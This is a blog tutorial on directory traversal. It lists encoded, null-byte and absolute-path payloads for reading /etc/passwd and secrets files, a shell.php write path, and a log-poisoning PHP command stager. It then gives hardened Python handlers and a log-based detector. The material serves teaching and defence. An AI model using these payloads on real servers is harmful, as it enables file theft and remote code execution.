Web Hacking Series - Part 9: Directory Traversal – Escaping the Web Root Jail🔓📂🚀

rocky, The Analyst

Hey guys, Rocky here! 🚪🔓

Welcome to Day 9 of the Daily Web Hacking series! So far, we’ve tackled authentication bypasses, file upload vulns, and XSS. Today, we’re diving into Part 9: Directory Traversal—the hack that lets you “escape” a website’s restricted folders and rummage through the server’s entire file system. Imagine breaking out of a prison cell only to find the warden’s secret file cabinet. Let’s get into it!

What is Directory Traversal?

Directory Traversal (aka Path Traversal) is a vulnerability that lets an attacker read, and in some apps write, files outside the web root directory (the folder where the website’s public files live). By manipulating file paths (e.g., ../../), hackers can:

  • Steal sensitive files (/etc/passwd, .env, backups).
  • Access source code or configuration files.
  • Plant malware or overwrite critical system files.

Why it’s dangerous:

How Directory Traversal Works

Web apps often build a file path from user-supplied input (profile pictures, PDFs, templates, language files). If the app doesn’t canonicalize that input and check that the result still sits under the intended directory, attackers can inject sequences like ../ to walk out of the web root.

Example:
A site loads user avatars via:

https://site.com/load?file=rocky.jpg  

An attacker changes file=rocky.jpg to:

file=../../../../etc/passwd  

Result: The server joins the value onto its avatar directory, the ../ sequences walk up to /, and it opens /etc/passwd and returns the system’s user list. You only need as many ../ as the directory is deep; extra ones are ignored once you reach /, so over-shooting is safe.

Types of Directory Traversal

1. Basic Traversal

  • Use ../ to climb directories. Windows accepts both ../ and ..\ (and mixed forms), so try the forward-slash version everywhere first.

  • Payload:

      ../../../../etc/passwd  

2. Encoded Traversal

  • Bypass naive filters with URL encoding, double encoding, or encoding the dots as well (%2e%2e/). Double encoding only pays off when the value is decoded twice, typically once by a WAF or front end and again by the app after the filter has already run.
  • Payloads:
    • URL-encoded: ..%2F..%2Fetc%2Fpasswd
    • Double-encoded: ..%252F..%252Fetc%252Fpasswd

3. Null Byte Injection

  • Terminate the filename early to defeat an extension the server appends itself (e.g., $file . ".jpg").

  • Payload:

      ../../etc/passwd%00.jpg  
    • C-based file APIs stop at the first NUL, so passwd%00.jpg is opened as passwd. This only works on legacy runtimes (PHP before 5.3.4 is the classic case); current PHP rejects paths containing a null byte, so treat it as a check for ancient stacks, not a first-line bypass.

4. Absolute Path Abuse

  • Reference the target by absolute path. Works when the app concatenates naively or uses a join helper such as Python’s os.path.join(), which silently drops the base directory when the second argument starts with /.

  • Payload:

      /etc/passwd  

Real-World Directory Traversal Disasters

  • Apache HTTP Server 2.4.49 (2021): CVE-2021-41773, a path-normalization bug that let anyone read files outside the document root with %2e%2e/ sequences. (CVE-2019-0211, often cited here, is a different httpd bug, a local privilege escalation, not traversal.)
  • WordPress (2017): Plugin flaw exposed wp-config.php files.
  • Tesla (2018): Misconfigured servers leaked vehicle telemetry.

Lesson: Even tech giants mess up.

Step-by-Step Exploitation

Goal: Steal the /etc/passwd file from a vulnerable photo-sharing site.

1. Find a Vulnerable Endpoint

  • Look for parameters like ?file=, ?page=, or ?load=.

  • Example URL:

      https://hacklivly.com/view?image=profile.jpg  

2. Test Basic Traversal

  • Modify the parameter:

      image=../../../../etc/passwd  
  • If root:x:0:0 comes back, it’s confirmed. If you get an error or an empty image, ramp the ../ count (the avatar directory may be deeper than four levels) before assuming there’s a filter.

3. Bypass Filters

  • If blocked, try encoding:

      image=..%2F..%2Fetc%2Fpasswd  
  • Or, on legacy PHP (pre-5.3.4), add a null byte:

      image=../../etc/passwd%00.jpg  

4. Escalate Access

  • Steal config files: .env, config.php, wp-config.php, then use the credentials inside them.
  • Execute code: if the parameter is include()d rather than just read, that’s file inclusion, and the log-poisoning and wrapper tricks in the next section turn a read into RCE. If the app lets you write, drop a web shell inside the web root.

Advanced Traversal Tactics

1. Writing Files

  • How: If the app writes user-controlled content to a user-controlled path (upload handlers, “save as” features, log or export writers) and the web server’s user can write into the document root.

  • Payload:

      ../../var/www/html/shell.php  
  • Impact: Execute commands via https://site.com/shell.php. The traversal has to land somewhere the server both serves and executes as PHP; a file written into an upload directory with PHP execution disabled is just a text file.

2. Log Poisoning

  • Only works when the endpoint include()s the file instead of reading it (that’s file inclusion, traversal’s nastier sibling). Get PHP into a log the web server’s user can read, then include the log. Send the stager in a header, not in the request path: browsers and curl percent-encode <, ? and spaces in the path, so it would hit the log as %3C%3Fphp and never parse. A raw request does it:

      GET / HTTP/1.1  
      Host: site.com  
      User-Agent: <?php system($_GET['cmd']); ?>  
  • Trigger execution (cmd rides along as an ordinary query parameter and is read by the stager through $_GET):

      https://site.com/view?file=../../var/log/apache2/access.log&cmd=id  
  • Caveat: on Debian/Ubuntu, Apache’s logs are root:adm mode 640, so www-data can’t read them and this path fails; check what the server’s user can actually open before spending time on it.

3. PHP Wrappers

  • If the endpoint include()s the file, asking for config.php executes it and shows you nothing. The php://filter wrapper hands back the bytes base64-encoded instead of running them:

      file=php://filter/convert.base64-encode/resource=../../etc/passwd  
  • Decode the Base64 output to get the file.

Tools for Directory Traversal

1. Burp Suite

  • Repeater: Test payloads manually.
  • Intruder: Brute-force common paths (/etc/passwd, .env).

2. DotDotPwn

  • Automated directory traversal tool:

      dotdotpwn -m http-url -u "http://hacklivly.com/load?file=TRAVERSAL" -k "root:"  
    • The http-url module substitutes its traversal dictionary for TRAVERSAL; -k names the string that counts as a hit, so it doesn’t report every 200.

3. FFUF (Fuzz Faster U Fool)

  • Fuzz for exposed files:

      ffuf -w paths.txt -u "https://hacklivly.com/view?file=FUZZ" -mc 200  
    • Feed it a wordlist of traversal payloads at increasing depth (../etc/passwd, ../../etc/passwd, …) rather than bare filenames, and quote the URL so the shell doesn’t treat ? as a glob.

Defending Against Directory Traversal

For Developers

  1. Input Validation

    • Don’t just strip ../ out: a filter that deletes one ../ turns ....// into ../ again. Reject any name containing a separator (/ or \) or a null byte, or reduce it to a bare filename and join it to a fixed directory.

    • PHP Example:

           $file = basename($_GET['file']); // keeps only the last path component, so ../ and /etc/ vanish  
           $path = '/srv/avatars/' . $file;  // then always join it to a fixed directory  
  2. Whitelist Allowed Files

    • Use a mapping of allowed filenames:

           allowed_files = {"profile.jpg": "images/profile.jpg"}  
           file = allowed_files.get(request.args.get('file'), "default.jpg")  
  3. Use Platform-Safe Functions

    • Python: os.path.realpath() on the joined path, then check containment with os.path.commonpath() (a plain startswith("/var/www/html") also accepts /var/www/html2 and /var/www/html.bak).

    • Java: resolve against the base directory, call normalize() (or toRealPath()), then check Path.startsWith(base), which compares whole path components, unlike String.startsWith.

  4. Store Files Outside Web Root

    • Keep avatars, uploads and exports in a directory the web server doesn’t map to any URL, and serve them through a handler that validates the name and streams the bytes. Then even a handler bypass finds nothing sensitive under the document root.
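The Types section’s payloads run through a naive handler and through the hardened one the four developer rules describe, as an added example that is not the post’s code: decode once, reject separators and control characters, canonicalize, and confirm containment with commonpath rather than a string prefix. /var/www/html is a placeholder and the store is a temp directory so the script runs anywhere. Running the naive join also shows why double encoding stays inside the root unless something decodes the value twice.

```python
"""Vulnerable vs hardened file serving for a ?file= parameter.

Added example for this post, not the site's code. The web root path is a
placeholder; the hardened store is a temp dir created for the demo.
"""
import os
import tempfile
import urllib.parse


def serve_vulnerable(web_root: str, user_file: str) -> str:
    """What the naive handler actually opens. Frameworks URL-decode the query
    once before the app sees it, so this decodes once too."""
    name = urllib.parse.unquote(user_file)
    # os.path.join DROPS web_root when name starts with '/', and normpath
    # collapses ../ past the root: both land outside the web root. A NUL in
    # name survives these string functions; open() then raises on modern
    # Python but truncated the name on old PHP.
    return os.path.normpath(os.path.join(web_root, name))


class PathTraversal(ValueError):
    """Raised for any name that isn't a plain file inside the store."""


def serve_hardened(store_dir: str, user_file: str) -> str:
    """Return the absolute path of a file inside store_dir, or raise.

    store_dir should sit outside the document root; the handler reads the
    file and streams it, so no URL maps onto the directory directly.
    """
    # 1. Decode exactly once. Decoding in a loop is what makes double encoding work.
    name = urllib.parse.unquote(user_file)
    # 2. NUL and other control characters truncate names in C-backed runtimes.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        raise PathTraversal("control character in filename")
    # 3. Accept a bare filename only: no separators, no '.' or '..' components.
    if name in ("", ".", "..") or "/" in name or "\\" in name:
        raise PathTraversal(f"path separator in filename: {name!r}")
    # 4. Canonicalise both sides and compare whole components, not a string
    #    prefix: startswith('/srv/files') would also accept '/srv/files2/x'.
    root = os.path.realpath(store_dir)
    candidate = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, candidate]) != root:
        raise PathTraversal(f"resolves outside store: {candidate}")
    # 5. realpath followed symlinks, so a planted link pointing outside the
    #    store was caught above; whatever remains must be a regular file.
    if not os.path.isfile(candidate):
        raise PathTraversal("not a regular file")
    return candidate


PAYLOADS = [
    "../../../../etc/passwd",            # basic
    "..%2F..%2F..%2F..%2Fetc%2Fpasswd",  # URL-encoded
    "..%252F..%252Fetc%252Fpasswd",       # double-encoded
    "../../etc/passwd%00.jpg",           # null byte
    "/etc/passwd",                        # absolute path
    "rocky.jpg",                          # the one legitimate request
]


def demo() -> dict:
    """Run every payload through both handlers; return what each decided."""
    results = {"vulnerable": {}, "hardened": {}}
    with tempfile.TemporaryDirectory() as store:
        with open(os.path.join(store, "rocky.jpg"), "wb") as f:
            f.write(b"\xff\xd8 not really a jpeg")  # constructed sample file
        for p in PAYLOADS:
            results["vulnerable"][p] = serve_vulnerable("/var/www/html", p)
            try:
                serve_hardened(store, p)
                results["hardened"][p] = "allowed"
            except PathTraversal as exc:
                results["hardened"][p] = f"blocked ({exc})"
    return results


if __name__ == "__main__":
    for handler, outcome in demo().items():
        print(handler)
        for payload, verdict in outcome.items():
            print(f"  {payload!r:40} -> {verdict}")
```

Step 3 already stops every payload on the list; steps 4 and 5 are there for the day someone relaxes it to allow subdirectories, or a symlink appears inside the store.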

For Admins

  1. File Permissions

    • Traversal reads files as the web server’s user, so that account’s permissions are the blast radius. 755 on the web root leaves it readable by everyone (the server included) but writable only by the owner, which is the point: the server should own nothing under the web root it doesn’t need to write, and secrets it doesn’t need (.env, config backups, database dumps) shouldn’t be readable by it at all.

         chmod 755 /var/www/html  
  2. Web Application Firewall (WAF)

    • Block the obvious ../, ..\, %2e%2e and etc/passwd strings. Treat it as a tripwire, not a fix: the encoding tricks above exist precisely to get past it.

  3. Log Monitoring

    • Alert on repeated traversal attempts.
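A detector for the “alert on repeated traversal attempts” rule, as an added example that is not from any product: it parses combined-format lines, decodes the path until it stops changing so encoded variants match the same pattern, counts attempts per client, and separately lists the hits the server answered with 200. The log lines are constructed for the example; addresses, paths and timestamps are made up.

```python
"""Flag repeated path-traversal attempts in web server access logs.

Added example for this post, not from any product. The sample log is
constructed: documentation-range IPs, invented paths and timestamps.
"""
import re
import urllib.parse
from collections import Counter

# Constructed sample in Apache/nginx combined format.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "GET /view?image=profile.jpg HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:01:09 +0000] "GET /view?image=../../../../etc/passwd HTTP/1.1" 403 199 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:10:01:11 +0000] "GET /view?image=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1870 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:10:01:14 +0000] "GET /view?image=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 403 199 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:10:01:20 +0000] "GET /view?image=....//....//etc/passwd%00.jpg HTTP/1.1" 500 0 "-" "curl/8.4.0"
198.51.100.4 - - [10/Mar/2024:10:02:00 +0000] "GET /static/css/site.css HTTP/1.1" 200 811 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:10:02:03 +0000] "GET /view?image=..%5c..%5cwindows%5cwin.ini HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A '..' component followed by a separator, checked after normalisation
# (so ..%2F, ..%252F, ..%5c and ....// all reduce to this).
TRAVERSAL_RE = re.compile(r"\.\./")
# Files nobody fetches through an image viewer on purpose.
SENSITIVE_RE = re.compile(
    r"/etc/(?:passwd|shadow)|wp-config\.php|(?:^|/)\.env(?:$|/)|/proc/self|win\.ini",
    re.IGNORECASE,
)


def normalise(raw: str) -> str:
    """Percent-decode until the value stops changing (bounded so nested
    encodings can't stall us), fold backslashes to slashes, and drop NULs so
    a %00 suffix doesn't hide the path that precedes it."""
    s = raw
    for _ in range(4):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/").replace("\x00", "")


def is_traversal(path_with_query: str) -> bool:
    s = normalise(path_with_query)
    return bool(TRAVERSAL_RE.search(s) or SENSITIVE_RE.search(s))


def scan(lines, threshold: int = 3) -> dict:
    """Count traversal attempts per client IP and single out the ones the
    server answered with 200; those deserve a look at the response size."""
    hits = Counter()
    successes = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if not is_traversal(path):
            continue
        hits[m.group("ip")] += 1
        if m.group("status") == "200":
            successes.append((m.group("ip"), path))
    return {
        "repeat_offenders": {ip: n for ip, n in hits.items() if n >= threshold},
        "successful_reads": successes,
    }


if __name__ == "__main__":
    print(scan(SAMPLE_LOG.splitlines()))
```

Decoding to a fixed point is the part most WAF rules skip; it is also what turns the 403/200 pattern in the sample (raw blocked, single-encoded served) into an obvious “the filter, not the app, is doing the blocking” signal.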

Practice Legally: Labs & Challenges

  1. DVWA (Damn Vulnerable Web App):
    • Practice traversal in the File Inclusion module.
  2. PortSwigger Labs:
    • Web Security Academy’s File path traversal labs walk from plain ../ through the absolute-path, double-encoding and null-byte bypasses.
  3. Hack The Box:
    • Machines like Traverxec focus on path traversal.

Ethical Hacking & Reporting

Never exploit traversal vulns without permission. If you find one:

  1. Document: Record steps to reproduce.
  2. Report: Use the site’s security contact or bug bounty program.
  3. Disclose: Wait for a fix before sharing publicly.

Final Thoughts

Directory traversal is the digital equivalent of picking a lock. It’s simple, silent, and shockingly effective. By validating inputs, hardening servers, and thinking like a hacker, you can slam the door on this attack.

Remember: The web’s security depends on you. Find flaws, fix them, and keep the internet safe—one ../ at a time.

Rocky out! ✌️

P.S. If you’re loving this series, share it with your crew! Let’s turn script kiddies into security guardians.

Discussion Question: What’s the wildest file you’ve accessed via traversal? I once found a database backup chilling in /var/backups. 😅 Spill your stories below! 👇